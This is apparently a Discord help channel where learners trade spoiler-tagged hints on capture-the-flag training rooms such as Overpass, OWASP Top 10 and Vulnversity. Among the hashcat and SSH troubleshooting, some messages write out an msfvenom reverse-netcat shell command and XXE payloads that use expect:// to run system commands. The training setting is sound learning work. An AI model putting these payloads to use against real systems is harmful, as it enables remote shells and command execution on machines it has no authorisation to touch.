#room-hints

1 messages ยท Page 42 of 1

white salmon
#

What do you call the IP address of your own router in your internal network?

stoic jewel
#

any hint about Jeff's room !!

quiet yarrow
#

Thanks @white salmon

thorny nest
#

Anybody willing to give hints for overpass? Got user but am lost looking for root.

vernal goblet
#

Can anyone give me a hint on Overpass ?

lucid crescent
#

any hint about Jeff's room !!
@stoic jewel look at write up

#

!writeup jeff

edgy gorge
#

Um can anyone tell me why priv esc is not working on Overpass

#

i don't want to spoil anything so that's why ๐Ÿ™ƒ

final mortar
#

You can ask help with spoiler tags, it's not an issue

white salmon
#

Splunk room. "When viewing search results, it's often useful to rename fields using user-provided tables of values. What command do we include within a search to do this?" Surely it's ||rename||?
@radiant dew The answer to this question is the last one I'm missing from completing the room. Can anyone give a hint what the correct answer could be?

keen willow
#

Can anyone give me a hint on Overpass ?
@vernal goblet what you want ?

#

any hint about Jeff's room !!
@stoic jewel sure, ask ๐Ÿ™‚

vernal goblet
#

@vernal goblet what you want ?
@keen willow
I found the admin page. Tried some sqli techniques, didn't worked. I need a hint to go forward

keen willow
#

you should check more on admin page. you may want to use ||browser's developer's network tab||.

vernal goblet
#

I did check that. It's using api that I know

edgy gorge
#

||i did point my ip to curl but i do not seem to get a rev shell maybe i'm running the python server on wrong dir ?||

keen willow
#

I did check that. It's using api that I know
@vernal goblet you need to get more info on how it is working.

#

||i did point my ip to curl but i do not seem to get a rev shell maybe i'm running the python server on wrong dir ?||
@edgy gorge copy the request and test it locally.

edgy gorge
#

||curl localhost ?||

keen willow
#

yup, on your attacker machine, where you started python server and wants to check if you have correct setup for reverse shell.

radiant dew
#

@radiant dew The answer to this question is the last one I'm missing from completing the room. Can anyone give a hint what the correct answer could be?
@white salmon I ended up looking through the Splunk docs for all six-letter commands and guessing a few. I kinda get what the question was going for, but I don't feel it's very well worded. Think about what command you would need to use if you wanted to access DATA from another table or a csv.

white salmon
#

@radiant dew I'm also thinking about this brute force approach. ๐Ÿ™‚

#

@radiant dew Thanks for the hint! I found it. I also think this question as well as some others are not very well-worded.

radiant dew
#

I'm still really happy they have a Splunk room and I would love more Blue Team rooms hint hint THM crew

white salmon
#

I'm preparing a write-up for the Splunk room. Maybe it will be helpful for future visitors.

oblique cliff
#

We donโ€™t post answers/writeups in this channel it defeats the purpose

white salmon
#

@oblique cliff Sorry, I removed the URL.

oblique cliff
#

Thanks

steep shard
#

hey guys im at the linux room at task 43 - the true ending and i just need to get into the /root/root directory and to do that i gotta have sudo permissions but unfortanetely none of the shiba users has it ๐Ÿ˜ญ what can i do?
@umbral tree same as me. even after checking on all users i still didn't figure out what to do... i found the user with sudo permissions but dont know what to do with this. ๐Ÿ˜ซ

rare zenith
#

@steep shard What is the user with sudo permission?

steep shard
#

@rare zenith the user is nootnoot

rare zenith
#

@steep shard Yeah I found that too from a screenshot in a previous task but I can't login there.

steep shard
#

i didnt even logged into it. i just changed the directory to his home folder

rare zenith
#

That doesn't change anything

steep shard
#

maybe we're just tired, the room creator said the solution was in the room

rare zenith
#

In the sudo task it advised us to check the man page of sudo.

#

I'll probably check sth from therre

steep shard
#

thanks for the advice

oblique cliff
#

@steep shard @rare zenith yโ€™all are on the right track if youโ€™ve found that!

#

Id recommend now looking at the files each of the users own and see if you find any out of place

rare zenith
#

Ok I'll check it out thx

steep shard
#

thank you @oblique cliff !

oblique cliff
#

๐Ÿ‘๐Ÿฟ

digital bolt
trim haven
#

Just ask your question

digital bolt
#

Ok, here goes :- [Task 8] [Day 2] Broken Authentication Practical Wondering how it is allowing " darren" to be registered ? Is it because white spaces are not removed before inserting

rotund skiff
#

still stuck on overpass. found ||/admin||. tried to use sqlmap and burpsuite to send xml payload but neither were successful. i know i need to use an owasp vuln, but totally stuck

formal pier
#

@rotund skiff you passed the owasp top 10 i have a question about the task XML External Entity - Exploiting

rotund skiff
#

@formal pier ask away

formal pier
#

did you passed the task 17

rotund skiff
#

yes, in the previous task xxe payload take that code and modify it

shut pollen
#

Anyone help with overpass ?

rotund skiff
#

how far along overpass are you?

shut pollen
#

Just started

#

Kinda stuck

rotund skiff
#

ahh ok yeah i'm stuck at the beginning too haha

#

run gobuster if you haven't already

ashen violet
#

@rotund skiff look at what else is on that page

white salmon
#

Hey, I have a problem and since it's too long, (exceeds 2000 characters) discord won't accept it. Here's the link to the pastebin https://pastebin.com/kfvXZG9p

rotund skiff
#

@white salmon hashcat ran just fine, look closely

#

@ashen violet ||login.js||?

ashen violet
#

Yes

white salmon
#

@white salmon hashcat ran just fine, look closely
@rotund skiff Yes, but isn't supposed to use my GPU instead of my CPU (my GPU is pretty decent and I'd like it to use it).
Plus, it says Status...........: Cracked but I can't seem to find the password anywhere :c

hasty gust
#

In the OWASP room - there's this question: ||How can we specify XML version and encoding in XML document?|| - I thought it was: ||xml version|| but it isn't accepted. Am I missing the obvious?

indigo ridge
#

look close

#

@rotund skiff Yes, but isn't supposed to use my GPU instead of my CPU (my GPU is pretty decent and I'd like it to use it).
Plus, it says Status...........: Cracked but I can't seem to find the password anywhere :c
@white salmon you got your pass

white salmon
#

Damn it x)

rotund skiff
#

i'm not sure about how to use the gpu, but the password is there they just don't make it obvious. look for where the original hash is displayed and you will see it

white salmon
#

I though this meant the difficlty

indigo ridge
#

In the OWASP room - there's this question: ||How can we specify XML version and encoding in XML document?|| - I thought it was: ||xml version|| but it isn't accepted. Am I missing the obvious?
@hasty gust read the material provided

rotund skiff
#

i would ask about the gpu problem though

white salmon
#

Thanks!

hasty gust
#

@indigo ridge I did. I'll read again. Must have missed something

indigo ridge
#

yep

white salmon
#

I mean it isn't necesssery atm soo

vapid zenith
#

When I can add blog room walkthrough

indigo ridge
#

go and add..btw there are already a lot of writeups

When I can add blog room walkthrough
@vapid zenith

vapid zenith
#

oo I don't check that okk bro I will add it

shut pollen
#

@rotund skiff any progress bro ?

rotund skiff
#

inspect the admin page, there is something there. not sure what to do with it though

shut pollen
white salmon
rotund skiff
#

rengo which one are you on

white salmon
#

Crack the hash, Task#2

rotund skiff
#

are you providing a wordlist?

white salmon
#

Nop, just the hash and the number of characters ?a?a?a?a?a?a?a?a?a?a?a

random thunder
#

where is the metasploit payload stored?

rotund skiff
#

@white salmon that writeup also tells you how to specify your gpu over cpu

oblique cliff
#

@random thunder be more specific please

#

What Room? (Link, Room title, room code from URL)
What Task? (Give the number!)
What question? (Number, maybe also basic details)
What have you tried?
What happened?
What didn't happen?
What did you expect to happen?
A picture paints a thousand words. Don't type a thousand words. Screenshots are awesome. Photos of your screen are not.
(If you want to paint a picture, we'll be impressed but a screenshot is really better)

random thunder
#

is there a specific location where the payload is stored? when i run msfvenom -p cmd/unix/reverse_netcat lhost=LOCALIP lport=8888 R ?

oblique cliff
#

Itโ€™s outputted right on the terminal

#

Itโ€™ll be mkfifo.....

#

Itโ€™s that line

white salmon
#

@white salmon that writeup also tells you how to specify your gpu over cpu
@rotund skiff I tried using my GPU but it seems like it doesn't detect it ๐Ÿ˜ฎ :
`root@kalinux:/home/idir# hashcat -D 2 -m 100 /home/idir/Desktop/hash.txt /home/idir/Desktop/worldlist/rockyou.txt
hashcat (v6.0.0) starting...

No devices found/left.

Started: Sat Jul 18 15:03:42 2020
Stopped: Sat Jul 18 15:03:42 2020
root@kalinux:/home/idir# `

rotund skiff
#

are you in a vm?

white salmon
#

Nop

#

I use Kali Linux in dual boot

merry helm
#

@rotund skiff I tried using my GPU but it seems like it doesn't detect it ๐Ÿ˜ฎ :
`root@kalinux:/home/idir# hashcat -D 2 -m 100 /home/idir/Desktop/hash.txt /home/idir/Desktop/worldlist/rockyou.txt
hashcat (v6.0.0) starting...

No devices found/left.

Started: Sat Jul 18 15:03:42 2020
Stopped: Sat Jul 18 15:03:42 2020
root@kalinux:/home/idir# `
@white salmon Try --force

white salmon
#

@merry helm Like hashcat -D 2 -m 100 /home/idir/Desktop/hash.txt /home/idir --force?

merry helm
#

@merry helm Like hashcat -D 2 -m 100 /home/idir/Desktop/hash.txt /home/idir --force?
@white salmon Yes

#

/home/dir/<wordlist> --force

shut pollen
#

Help with overpass anyone ?

#

One thing l noticed is that ||username and password are in clear text||

#

Is it of any avail ?

white salmon
#

@merry helm `root@kalinux:/home/idir# hashcat -D 2 -m 100 /home/idir/Desktop/hash.txt /home/idir --force
hashcat (v6.0.0) starting...

You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
No devices found/left.

Started: Sat Jul 18 15:12:04 2020
Stopped: Sat Jul 18 15:12:04 2020
root@kalinux:/home/idir# `
Still :/

fast swan
#

@shut pollen No. To get in, you need to find something in the dev console, specifically the network tab

#

or Application

merry helm
#

@merry helm `root@kalinux:/home/idir# hashcat -D 2 -m 100 /home/idir/Desktop/hash.txt /home/idir --force
hashcat (v6.0.0) starting...

You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
No devices found/left.

Started: Sat Jul 18 15:12:04 2020
Stopped: Sat Jul 18 15:12:04 2020
root@kalinux:/home/idir# `
Still :/
@white salmon Missed comparison wordlist

#

hashcat -D 2 -m 100 /home/idir/Desktop/hash.txt /home/idir/<wordlist> --force

rotund skiff
#

rockyou wordlist can be found /usr/share/wordlists/rockyou.txt make sure you unzip it first

shut pollen
#

@fast swan thanks for the hint but I still don't get it

rotund skiff
#

haha yeah me neither

white salmon
#

`root@kalinux:/home/idir# hashcat -D 2 -m 100 /home/idir/Desktop/hash.txt /home/idir/Desktop/worldlist/rockyou.txt --force
hashcat (v6.0.0) starting...

You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
No devices found/left.

Started: Sat Jul 18 15:17:48 2020
Stopped: Sat Jul 18 15:17:48 2020
root@kalinux:/home/idir# `
Even with the right path!...

#

rockyou wordlist can be found /usr/share/wordlists/rockyou.txt make sure you unzip it first
@rotund skiff Ok I'll try this

fast swan
#

@fast swan thanks for the hint but I still don't get it
@shut pollen I can't really say much more without giving it away

#

You'll kick yourself when you get it

white salmon
#

@rotund skiff Ok I'll try this
@white salmon Doesn't work, there's no wordlist folder in /usr/share/

rotund skiff
#

strange, that comes default on kali

bronze ivy
#

@white salmon Doesn't work, there's no wordlist folder in /usr/share/
@white salmon try wordlistS

merry helm
#

`root@kalinux:/home/idir# hashcat -D 2 -m 100 /home/idir/Desktop/hash.txt /home/idir/Desktop/worldlist/rockyou.txt --force
hashcat (v6.0.0) starting...

You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
No devices found/left.

Started: Sat Jul 18 15:17:48 2020
Stopped: Sat Jul 18 15:17:48 2020
root@kalinux:/home/idir# `
Even with the right path!...
@white salmon Omit -D

white salmon
#

I mean, there's no folder that has 'word' inside

#

Like none, I checked

rotund skiff
#

do what waldir said, just run on cpu for now

white salmon
#

@white salmon Omit -D
@merry helm It works without -D

#

I just would like it to work with my GPU, it can be useful for some cracks

#

It just worked on cpu

rotund skiff
white salmon
#

Okk

#

Thank you guys anyway

random thunder
final mortar
#

What do you mean

random thunder
#

what command gets. me this result?

oblique cliff
#

no clue, can you show us what you did

bronze ivy
#

Seems like output from MOTD file

final mortar
#

yeah looks like a welcome message you will get when you connect via ssh or something

random thunder
rotund skiff
#

@fast swan mind if i dm?

final mortar
#

this is the question and after running the script that's the result and i have no clue which commands can get that
@random thunder Room

random thunder
fast swan
#

@fast swan mind if i dm?
@rotund skiff Sure!

final mortar
random thunder
#

task9 -> #2 * Sorry

final mortar
#

You have to go to user5's home directory where there is a file called script as the question says

#

run that file and based on the output determine what command was executed

#

you can easily tell when you see it

random thunder
#

shit sorry* got it now. i thought i ran and i got the welcome message and got stuck

oblique cliff
#

PG-13 plz

fast swan
#

I'm just gonna leave this here !rule1

final mortar
#

!rule 1

proud scarabBOT
#

Rule 1: No unsolicited direct messages (DMs) to other members of the discord. This includes staff. Verify that the member you are messaging is ok with you sending them DMs. The only exception to this rule is if a situation warrants the involvement of a moderator in order to handle something such as harassment or a situation where another member of the discord has made you feel uncomfortable.

final mortar
#

@fast swan This is the reason he asked for your permission first. You can just decline it's not that much of an issue, but you can't quote rule 1 I think, not just yet

fast swan
#

@final mortar I've had multiple haha

rotund skiff
#

some people see someone accept the request and think it applies to all dms

tropic flame
#

@fast swan thanks for the hints on Overpass, I was way overthinking it!

fast swan
#

@fast swan thanks for the hints on Overpass, I was way overthinking it!
@tropic flame No problems! I was as well last night. Completely overlooked it myself

cedar coral
#

@fast swan can i dm ?

#

@rotund skiff you got it ? (overpass foot)

pseudo hamlet
#

hello guys doing vulnversity in task 4 Burpsuit bruteforce for file extension is not working .php,.phtml.php3,php4,php5

#

i tried all

#

Burp Response is Extension not allowed for all

white salmon
#

Could you show us a screenshot of your Burpsuite intruder window?

#

And a example request

pseudo hamlet
#

@white salmon

white salmon
#

Show me a screenshot of the Request

#

any request works- as long as it's one of your intruder ones

pseudo hamlet
white salmon
#

Hmm

valid rune
#

i'm sort of frustrated with with learn linux last task "The flag" .. i sort of looked almost everywhere, i used the find and grep commands .. to no avail. i am the point that i don't really know what to look for. tried looking for files that are sort of strange.

trim haven
#

@valid rune Task, question?

#

I'm presuming it's the last one

stuck fractal
#

learn linux last task

#

Task 43, only one question

trim haven
#

Oops myb

valid rune
#

@trim haven yes it is.

trim haven
#

Have you been looking for files which are owned by specific users, which are also strange

white salmon
#

@pseudo hamlet Try re-intercepting a file request again, and re-do the intruder setup

valid rune
#

hmmmm i did lots of things .. i am at the point i forgot what i did.

trim haven
#

If you could detail any commands you used and send them in spoiler text, I can nudge you to getting the correct command

stuck fractal
#

I've seen payload encoding mess with it before. If it's on, turn it off and vice versa @pseudo hamlet

white salmon
#

Oh right, I forgot about that too

valid rune
#

i did use ||find|| , ||grep|| and ||ls|| and|| ls -al|| aloott

white salmon
#

You can tell if encoding is on by looking at the Request of one of your attacks

trim haven
#

No the commands, || find / [flag] [flag] [flag] ||

bronze ivy
#

i did use ||find|| , ||grep|| and ||ls|| and|| ls -al|| aloott
@valid rune The task already says where the flag is, you have to look for a way to escalate

trim haven
#

It does not

bronze ivy
#

There's one flag on this machine and it's in /root/root.txt

trim haven
#

You have to priv esc to get to it

bronze ivy
#

It's a really easy way btw, just google a little

trim haven
#

And I'm helping Crowsy find out what they need to do to priv esc.

valid rune
#

by ||[flag]|| did you mean the command ||flag|| or the the answer which is the ||flag|| ?

trim haven
#

By flag I mean, you can't just type find and expect it to do things, you have to give the command some flags etc to work look specifically.

valid rune
#

i also never used google for this .. i'm trying finding out through the write ups and with in terminal manuals.

stuck fractal
#

Use google for command documentation and examples too

trim haven
#

You can easily find out through write-ups so if you're really using write-ups you're not trying hard enough

wraith tapir
#

in Overpass,i ||Understood how the api works|| and what does it do , but i dont understand how to go further

stuck fractal
#

Jabba, if you learn something from the write-up then you're fine

valid rune
#

i did use ||find /* | grep ||

stuck fractal
#

Don't do that

#

Find can do all the filtering you need

#

Don't pipe find to grep

#

You want to look for files belonging to each user, one by one

trim haven
#

You may want to re-read the find section and or google

stuck fractal
#

There's a flag for find to check the owner

#

@wraith tapir you don't have a username or password. You want to get in. It's not SQLi. Keeping working through the top 10 that's been covered so far

wraith tapir
#

Aight i think that will do thanks

pseudo hamlet
#

done Ty

valid rune
#

hmmmm will try that again .. thanks guys.

#

i did go through the find task extensively .. but i guess i'm missing something

stuck fractal
#

There's a whole room dedicated to the find command

valid rune
#

yaahh i didn't get to that room yet

#

i'm following the learning path.

stuck fractal
#

You're not locked in to that

#

You can take a break, do some rooms to build up your skills, and come back

sick sun
#

need help overpass room

stuck fractal
#

Help or a hint?

valid rune
#

well i guess i'm going to do that. just going to try it this hour and if i couldn't .. i'll go to other rooms to build up my skill. but this is pretty very useful. i feel like i can use linux finally. i have tried soo many times in the past, i just couldn't.

bronze ivy
sick sun
#

hint, im stuck on started

bronze ivy
#

It's totally ok spending a lot of time and being stuck

well i guess i'm going to do that. just going to try it this hour and if i couldn't .. i'll go to other rooms to build up my skill. but this is pretty very useful. i feel like i can use linux finally. i have tried soo many times in the past, i just couldn't.
@valid rune

sick sun
#

find some ||/api|| but response is ||404 page||

bronze ivy
#

It's part of infosec

stuck fractal
#

find some ||/api|| but response is ||404 page||
@sick sun you're going to have to go learn about APIs then.

valid rune
#

@bronze ivy usually in these cases i give up .. but this time i feel like it's a challenge and i need to solve it.

sick sun
#

@stuck fractal so im on wrong path ?

stuck fractal
#

I'm not going to answer that

#

But learn what an API is.

sick sun
#

ok, i will learning again

marble dagger
#

need a hint/sanity check on overpass. I'm looking at something, but I don't know if I'm in a deep rabbit hole

stuck fractal
#

I didn't build any real rabbit holes in, so chances are it's either one you've dug yourself or it's the right way

merry helm
#

I'm stuck for some time in Overpass, I'll go back a few steps in learning, do not know how to proceed ...

marble dagger
#

maybe I need to take a break on overpass. I'm tunnel visioned. values won't change, just by starring at them, I guess ๐Ÿ˜„

odd panther
#

can help with overpass as far as user.. Still working it haha

#

hints tho, can't tell you how

#

Also any hints for root priv esc please pm me ๐Ÿ™‚

stuck fractal
#

Also any hints for root priv esc please pm me ๐Ÿ™‚
@odd panther How much enumeration have you done?

#

Because you should find something pretty quick

odd panther
#

about 5 hours now...

stuck fractal
#

Try some enum scripts

odd panther
#

I'm still not close haha, normally not an issue with linux priv esc, I am jsut lost on this one, I am obviously missing it totally and i bet its staring me in the face. I will do more tho, I would assume a suid trick

#

My issue is this is the first box, I've not had the users password for things like sudo -l, so its throwing me off until I know more.

#

also thanks for the box too @stuck fractal is very good

stuck fractal
#

It's not suid but you can get the user password

#

I won't tell you how, but once you've got a shell it's not that hard

odd panther
#

oh? Ok, I will work on that first then thank

merry helm
#

can help with overpass as far as user.. Still working it haha
@odd panther Do you mind going private and giving me a light?

odd panther
#

na that's great i did not think i could, thank you.

#

Has something happened to the box? yesterday it was great, today can't even get ssh login (works but VERY slow) still waiting on the login...

stuck fractal
#

You don't share instances here

#

So nothing has happened to the box

odd panther
#

was lighting last night

stuck fractal
#

It's a little slower if you're not a subscriber

odd panther
#

oh..

#

ok

#

its so bad, i type "wget" and have to wait for it (20secs) to display lol

stuck fractal
#

I've asked skidy to bump the resources

#

Nothing more I can do

white salmon
#

@stuck fractal others including me are having issues with overpass, dk why it is laggy af and after 4-5 mins the box stops responding

odd panther
#

Its ok changing vm also to test

stuck fractal
#

Literally just answered that

#

be a subscriber

#

Problem solved

#

Its ok changing vm also to test
@odd panther wat

odd panther
#

changing vm = Virtual machines.

stuck fractal
#

Yes

#

I know what a VM is...

odd panther
#

then why you like wat?

#

?

stuck fractal
#

Because I have no idea what you meant by that statement

odd panther
#

i see

stuck fractal
#

Please don't dump answers

upbeat wren
#

oki sry

#

there u go

#

may i have some help with no 6 pls

stuck fractal
#

Room, task, question

oblique cliff
#

Screenshots not phone pictures

stuck fractal
#

Don't take a photograph of your screen. Take a screenshot.

indigo ridge
#

some nudge on that ||api|| thing in overpass

oblique cliff
#

Why do people take phone pics I donโ€™t understand

odd panther
#

check what its doing the API and follow along the code

upbeat wren
#

cos i cant logon to discord on da laptop

#

cos its my cousins

#

room rpburpsuite

#

task 7

#

q6

white salmon
#

some nudge on that ||api|| thing in overpass
@indigo ridge got foothold?

indigo ridge
#

no

white salmon
#

api is nothing

wraith tapir
#

Woah what

odd panther
#

Read the api files to see what its doing

stuck fractal
#

Read the api files to see what its doing
@odd panther ...you can't

#

The API is serverside

#

You can look at the JS

odd panther
#

sorry the .js

wraith tapir
#

Thats done ,Making arbitrary req

#

To the api

#

Numerous req nothing seems to work dont know what im overlooking pepehands

indigo ridge
#

same here

odd panther
#

When you find it you will kick yourself too

wraith tapir
white salmon
#

Its one of the owasp top 10 that have been covered

#

In the ongoing 10 day challenge

indigo ridge
#

Its one of the owasp top 10 that have been covered
@white salmon i think it is idor

white salmon
#

Try em see you'll get it , its one of em

wraith tapir
#

there is not param for idor

odd panther
#

So If i sub this box will instantly start to respond? still VERY slow rn

#

(maybe too many on it free)

wraith tapir
#

Its not like too many tho, But your ip got less resources so it doesnt work propery some times

#

subbing would do it faster

#

Much more resources

odd panther
#

oh i see, yes its like it now. I may just sub then, was going to anyway

#

only a few on the box "376 users are in here"

stuck fractal
#

That's not how boxes here work @odd panther

wraith tapir
#

Its not like HTB

odd panther
#

Oh single instance each?

wraith tapir
#

yeah

odd panther
#

ok nice, thanks.

white salmon
#

@odd panther you can decrypt the rsa with openssl so you won't have to wait for "Enter the pass pharse" thing

odd panther
#

i have the pass, but it still asks.

stuck fractal
#

Yeah it will

odd panther
#

(unless i did something wrong, ssh2john used)

stuck fractal
#

You have to decrypt the key before you can use it

odd panther
#

yea

stuck fractal
#

You still need to use that passphrase

white salmon
#

yeah

odd panther
#

yeah i was

thorny nest
#

With overpass privesc, do I need to pivot to a different user to gain root or is there an easier way?

odd panther
#

just box is slow, enter key wait login.... and wait... and wait... lol

stuck fractal
#

just box is slow, enter key wait login.... and wait... and wait... lol
@odd panther Stop complaining. I've asked skidy to add more resources. Your choice is either wait, or put up with it.

odd panther
#

Oh I'm ever so sorry for brining up and issue, I thought this was a place of help.. My bad...

#

jesus

stuck fractal
#

You know, it is

#

But there's nothing that can be done RN

#

So you're just whining about the same issue that is being fixed

odd panther
#

Right well no need to be a martyr buddy.. I asked a question for help..

stuck fractal
#

No, you complained

#

That wasn't a question

wraith tapir
#

Oh I'm ever so sorry for brining up and issue, I thought this was a place of help.. My bad...
@odd panther Yo man just tell me ill give you the flags kekw

odd panther
#

ok, As you say buddy

stuck fractal
#

Not your buddy

odd panther
#

ok pal

stuck fractal
#

Not your pal.

odd panther
#

ok love

stuck fractal
#

Stop.

tidal sedge
#

๐Ÿ”จ

wraith tapir
#

๐Ÿ‘€

odd panther
#

literally stopped lol

tidal sedge
#

@indigo ridge There is no reason for your comment, a mod has already told them to stop

indigo ridge
#

sorry

odd panther
stuck fractal
#

Use a correct username.

odd panther
#

it keeps resetting, anyone else getting this too? Or am i the special one

wraith tapir
#

redeploy

stuck fractal
#

Your key isn't in a valid format

#

It's telling you that

odd panther
#

it was telling me that before.. ok (and let me in) maybe why I'm confused and "moaning" as you put it.

stuck fractal
#

No, you were complaining about the box speed

#

Which is being addressed

#

So you should be happy about that

odd panther
#

Should I now, ok great thank you

stuck fractal
#

Yep.

#

Glad you're satisfied.

odd panther
#

Excellent >.<

#

Totally ๐Ÿ™‚ (LOL)

worthy iris
#

Permission denied (publickey) how does one go about fixing this error?

#

while trying to ssh into a machine

jolly folio
#

Use a public key

worthy iris
#

if you only have private?

#

how would i resolve that

#

is there a way to generate a public via a private?

odd panther
#

I'll try later for this, do you know when it may be back to speed at all @stuck fractal Or is it a more first come first serve basis here? thanks.

jolly folio
#

@worthy iris ssh -i /path/to/key <user>@<host>

tidal sedge
#

@odd panther Once Skidy(one of the admins) comes online he will bump up the resources

odd panther
#

Oh I see, ok thank you for the help. @tidal sedge

worthy iris
#

I do that, that's how I get the error, I only have a private rsa key

jolly folio
#

What are the permissions on the key?

worthy iris
#

700

odd panther
#

should be 600

#

isn't it?

jolly folio
#

There is no reason for it to have u+x so, I'd set it to 600

worthy iris
#

so just having the private key alone isnt enough i take it

odd panther
#

it should be, chmod 600 key then try to use it

worthy iris
#

same results ๐Ÿ˜ฆ

odd panther
#

Where is this from (what box?)

pseudo hamlet
#

Guys need help in Vulnversity privesec

fathom jolt
#

need some help at the overpass room can some one gimme a hint please

jolly folio
#

It helps when you actually say what you're struggling with

fathom jolt
#

the login page don't know what todo exactly

jolly folio
#

I'm just going to go ahead and assume you probably need to enumerate more

odd panther
#

the login page don't know what todo exactly
@fathom jolt What on the page do you see using Dev tools? (f12) look about

pseudo hamlet
#

guys systemctl privesc help

oblique cliff
#

@pseudo hamlethave you googled anything about that?

stuck fractal
#

@odd panther Terminate, redeploy.

#

It's been bumped. You're welcome.

pseudo hamlet
#

yes

#

i google privesec using sysctl

jolly folio
odd panther
#

I thank Skidy for sure, your attitude while dealing with this was more then subpar sorry to say, so much so i don't even want to sub now due to you. but THANKS...

#

You're Welcome..

jolly folio
#

I'm going to assume that was a joke lol

stuck fractal
#

Eh, they do nothing but complain about things that are being fixed

odd panther
#

I came here for help tbh not to be chastised for a slow box i knew nothing of. Also I was asking, i never got an answer apart from some smart replies..

#

But still no issues, I do thank you for asking for the box to be updated. Just was not overly happy with how you spoke to me, I'll put it down to tiredness from you, I'm sure you're not this obtuse usually

#

I'll be honest, I really love thm.

stuck fractal
#

I'm sure you don't complain this much about things that I'm actively trying to get fixed normally

odd panther
#

but today you made me feel like i don't want to come for help lol

#

it should not be like that, your a mod to help man..

#

Ok I can see your still the same, James. Have a good day brother

jolly folio
#

Nah, just read up.. I disagree with ya there entirely

odd panther
#

You may disagree with me, we can't all agree.

jolly folio
#

Anyway, off-topic for channel - convo dead

odd panther
#

This was how i felt and you're quite right, its enough. Get cracking that box!!! (those who have not already)

jolly folio
#

I just went through wonderland

fathom jolt
#

@fathom jolt What on the page do you see using Dev tools? (f12) look about
@odd panther did it but didn't found any thing

odd panther
#

Where are you looking? Like see... how is the page loaded. What's being loaded, scripts etc, this is a good start on any box

#

Also I'll be honest, I'm a noob too, been at this 35days now lol so a lot to learn (why i ask here)

fathom jolt
#

I didi and found that the passwords are encrypted in ||rot47|| but don't know where is || the file with encrypted passwords .. ||

odd panther
#

I will mess things up I will ask

#

what box are you on?

rapid flower
#

Help with initial foothold in overpass... I know something is in l****.js but what... Idk... Some hints needed

odd panther
#

Read the .js files, learn how it works. (its all we can really say at this stage)

rapid flower
#

It's the f**** function... I'm not understanding

white salmon
#

|| authentication is broken ||

odd panther
#

I don't think I can say more, its upto the mods here to help more, I feel If i give more its too much

worn yew
#

I'm in Owasp to 10 today's task(day 6 - task 20) and I googled about pensive notes but unable to find the documentation

#

Anyone got anything?

odd panther
#

O.o not even checked todays out!

#

Day 7 is not out yet?

lyric scarab
#

day 6

worn yew
#

Thanks changed it

odd panther
#

Working now, wish the customers would hurry up so I can get back to the box's xD

worn yew
#

yeah web app is running pensive notes which might have default creds but no luck by trying admin -admin but hint says look to documentation but no luck in finding it

lyric scarab
#

What is the first question of the hint ?

white salmon
#

app source code

odd panther
worn yew
#

No idea

halcyon citrus
#

owasp day 6 . app source code ,,, any hints for that ?

worn yew
#

Stuck on the same

stuck fractal
#

What's a common website used to share source code for open source projects?

#

Google doesn't index everything

digital bolt
#

Hi, does anyome know how to replace firstName name also with any ENTITY ??
<!DOCTYPE replace [<!ENTITY name "Test"> ]>
<userInfo>
<firstName>falcon</firstName>
<lastName>&name;</lastName>
</userInfo>

#

Also, want to run other system command like id,ls,ps but they are not working on https://tryhackme.com/room/owasptop10
Used this but no result:-
<?xml version=โ€1.0โ€ณ encoding=โ€utf-8โ€ณ?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM โ€œexpect://idโ€ >]>
<root>
<name>&xxe;</name>
</root>

stuck fractal
#

Doesn't that assume expect is enabled?

rapid flower
#

Wrong chat๐Ÿ˜…

odd panther
#

ok in to the site. again read the code lol

digital bolt
#

ok so expect is not enabled then, but if yes than this should work ? another example :- <?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'expect://id'>]>
<root>&read;</root>

spice stream
#

What's a common website used to share source code for open source projects?
@stuck fractal Well played

stuck fractal
#

Try not to spoil it

rapid flower
#

This was damnnnn dirtyyyyy๐Ÿ˜‚๐Ÿ˜‚๐Ÿ˜‚๐Ÿ˜‚๐Ÿ˜‚๐Ÿ˜‚๐Ÿ˜‚๐Ÿ˜‚

random thunder
#

Try not to spoil it
@stuck fractal that spoiled the fun for me i finally got it ๐Ÿ˜†

white salmon
#

lol i didn't read the readme and got straight to the database and tried to crack that PW with rockyou - without success

rapid flower
#

lol i didn't read the readme and got straight to the database and tried to crack that PW with rockyou - without success
@white salmon
I was going to do the same

white salmon
#

Therefore reminder: RTFM!

rapid flower
#

I am suspecting... If the same solution is for overpass initial foothold๐Ÿค”

stuck fractal
#

Nope.

marble moat
#

Anyone getting anything from the source code of the webapp for day 6??

stuck fractal
#

What's a common website used to share source code for open source projects?
@stuck fractal

odd panther
#

I can't even find it on there, need better google fu

stuck fractal
#

Don't use google

#

Google doesn't index everything

odd panther
#

Oh god you really know how to mess me up James haha

oblique cliff
#

Don't use google
@stuck fractal
Thatโ€™s a first

stuck fractal
#

Second.

#

It applied in Advent Of Cyber too

marble moat
#

@stuck fractal I used developer options to see the HTML code but I'm not getting anything in it

stuck fractal
#

You're looking for serverside information by viewing client-side code?

oblique cliff
#

That fact that you actually know the count is impressive enough

odd panther
#

oh so we can enum? I've only been using the dev tools lol

stuck fractal
#

Do what you want with the VM and webapp, but there's an intended solution

odd panther
#

I would rather go intended, I'm here to learn, if not very slowly. I mean its intended for a reason so I should aim for it

marble moat
#

@stuck fractal well I thought it was similar to the day 3 one

stuck fractal
#

@odd panther Have you seen the hint I've given?

white salmon
#

you can google open source community

odd panther
#

no... but let me stare at your words for a while, I bet its obv too.. thank you again

stuck fractal
#

What's a common website used to share source code for open source projects?

odd panther
#

yeah i know, but i can't find this on it

merry helm
#

Closed room, thank you to the colleague @odd panther who assisted me in the first steps.

odd panther
#

Da man! Good job!

stuck fractal
#

I can confirm you can find it

#

Don't have to be signed in or anything

merry helm
#

A good challenge, I learned new things, thank you @stuck fractal

sinful badger
#

I am doing the Blue Primer Networking room but I am stuck on this problem, can someone please give me a hint:

stuck fractal
#

Please don't show answers

sinful badger
#

Sorry it was part of a two part question

#

Let me try again

stuck fractal
#

The second is similar to the first

odd panther
#

ok thank you. (i've not done any enum thought it was not ok for this one, doing now)

sinful badger
stuck fractal
valid rune
#

